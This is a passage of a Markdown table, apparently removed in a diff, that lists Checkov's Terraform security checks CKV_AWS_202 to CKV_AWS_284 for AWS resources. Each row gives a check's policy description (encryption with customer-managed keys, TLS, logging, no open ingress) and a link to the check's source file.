-| 292 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) |
-| 293 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) |
-| 
294 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) |
-| 295 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) |
-| 296 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) |
-| 297 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) |
-| 298 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) |
-| 299 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) |
-| 300 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) |
-| 301 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | 
[BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) |
-| 302 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) |
-| 303 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) |
-| 304 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) |
-| 305 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) |
-| 306 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) |
-| 307 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) |
-| 308 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | 
[APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) |
-| 309 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) |
-| 310 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) |
-| 311 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) |
-| 312 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) |
-| 313 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) |
-| 314 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) |
-| 315 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | 
[ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) |
-| 316 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) |
-| 317 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) |
-| 318 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) |
-| 319 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) |
-| 320 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) |
-| 321 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) |
-| 322 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | 
[NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) |
-| 323 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) |
-| 324 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) |
-| 325 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) |
-| 326 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) |
-| 327 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) |
-| 328 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) |
-| 329 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to 
port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) |
-| 330 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) |
-| 331 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) |
-| 332 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) |
-| 333 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) |
-| 334 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) |
-| 335 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) |
-| 336 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) |
-| 337 | CKV_AWS_240 | 
resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) |
-| 338 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) |
-| 339 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) |
-| 340 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) |
-| 341 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) |
-| 342 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) |
-| 343 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | 
[RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) |
-| 344 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) |
-| 345 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) |
-| 346 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) |
-| 347 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) |
-| 348 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) |
-| 349 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | 
[RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 350 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 351 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | -| 352 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | -| 353 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | -| 354 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | -| 355 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | -| 356 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | 
Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | -| 357 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | -| 358 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 359 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | -| 360 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 361 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 362 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | 
[SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 363 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 364 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 365 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | -| 366 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | -| 367 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | -| 368 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | -| 369 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | 
[DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | -| 370 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | -| 371 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | -| 372 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | -| 373 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | -| 374 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | -| 375 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | 
[LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | -| 376 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | -| 377 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 378 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 379 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 380 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 381 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 382 | CKV_AWS_274 | resource | 
aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 383 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | -| 384 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | -| 385 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 386 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 387 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 388 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | -| 389 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | -| 390 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | -| 391 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | -| 392 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | -| 393 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | -| 394 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | 
